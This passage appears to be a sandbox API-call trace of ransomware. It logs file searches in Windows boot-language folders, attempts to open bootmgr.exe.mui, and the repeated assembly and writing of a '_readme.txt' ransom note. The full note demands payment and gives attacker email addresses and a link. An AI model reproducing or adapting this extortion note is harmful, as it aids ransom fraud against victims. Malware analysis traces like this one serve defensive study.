ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0210.025] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\_readme.txt" (normalized: "c:\\boot\\fr-fr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.025] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.025] PathFindExtensionW (pszPath="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned=".mui" [0210.025] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.025] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.025] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.025] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.026] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0210.026] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0210.026] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0210.026] PathFindFileNameW (pszPath="") returned="" [0210.026] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0210.026] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0210.026] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0210.026] FreeLibrary (hLibModule=0x761b0000) returned 1 [0210.027] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0210.027] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 0 [0210.027] lstrcpyW (in: lpString1=0x3a88060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0210.027] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0210.027] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\_readme.txt" (normalized: "c:\\boot\\hu-hu\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.027] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.027] PathFindExtensionW (pszPath="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned=".mui" [0210.027] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.028] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.028] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.028] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.028] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0210.028] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0210.028] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0210.028] PathFindFileNameW (pszPath="") returned="" [0210.028] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0210.029] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0210.029] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0210.029] FreeLibrary (hLibModule=0x761b0000) returned 1 [0210.029] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0210.029] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 0 [0210.029] lstrcpyW (in: lpString1=0x3a88060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0210.029] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0210.029] CreateFileW (lpFileName="C:\\Boot\\it-IT\\_readme.txt" (normalized: "c:\\boot\\it-it\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.030] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.030] PathFindExtensionW (pszPath="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned=".mui" [0210.030] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.031] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.031] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.031] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.031] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0210.031] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0210.032] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0210.032] PathFindFileNameW (pszPath="") returned="" [0210.032] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0210.032] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0210.033] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0210.033] FreeLibrary (hLibModule=0x761b0000) returned 1 [0210.033] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0210.033] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 0 [0210.033] lstrcpyW (in: lpString1=0x3a88060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0210.033] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0210.033] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\_readme.txt" (normalized: "c:\\boot\\ja-jp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.033] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.034] PathFindExtensionW (pszPath="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned=".mui" [0210.034] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.036] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.036] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.037] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.037] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0210.037] PathFindFileNameW 